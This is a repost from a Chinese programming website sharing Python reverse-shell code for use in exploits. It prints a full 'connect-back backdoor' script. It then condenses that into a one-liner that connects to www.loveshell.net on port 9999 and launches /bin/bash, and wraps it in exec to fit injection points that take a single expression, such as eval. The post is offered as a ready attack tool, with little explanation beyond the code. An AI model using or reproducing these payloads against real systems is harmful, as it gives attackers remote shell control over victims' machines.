首页 > 编程 > Python > 正文

在漏洞利用Python代码真的很爽

2020-02-23 04:39:24
字体:
来源:转载
供稿:网友
不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006/n"
  print "Usage: %s <conn_back_host> <port>/n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------/n")
  s.send("----------------------------- By wofeiwo -----------------------------/n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()



用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master/r/n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?/r/n");os.system("/bin/bash");s.close();s.send("See u next time!/r/n");


如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master//r//n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?//r//n");os.system("/bin/bash");s.close();s.send("See u next time!//r//n");';

上一篇:学习python (1)

下一篇:python下如何让web元素的生成更简单的分析

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
学习交流
更多

笔记本开机提示error loading os错误的问

笔记本开机提示error loading os错误的问题怎么解决...
热门图片
更多
猜你喜欢的新闻
猜你喜欢的关注

新闻热点

雷军:小米成立10年收入突破2000亿
2020-02-23 14:27:16
特斯拉:无钴,不代表一定是磷酸铁锂电池
2020-02-22 09:45:28
豌豆荚宣布业务调整 将于2月28日关闭PC版在线服务
2020-02-22 09:42:20
小米集团宣布人事任命:联合创始人王川担任小米集团首席战略官
2020-02-22 09:39:07
外媒:高通康宁合作开发毫米波5G室内解决方案
2020-02-21 16:46:56
华为终端产品与战略线上发布会:5G全场景,共联未来
2020-02-20 10:01:00

疑难解答

图片精选

网友关注

关于本站 - 网上投稿 - 商务合作 - 隐私政策 - 网站地图
Copyright © 2008 - 2020 VEVB.COM. All Rights Reserved.武林网 版权所有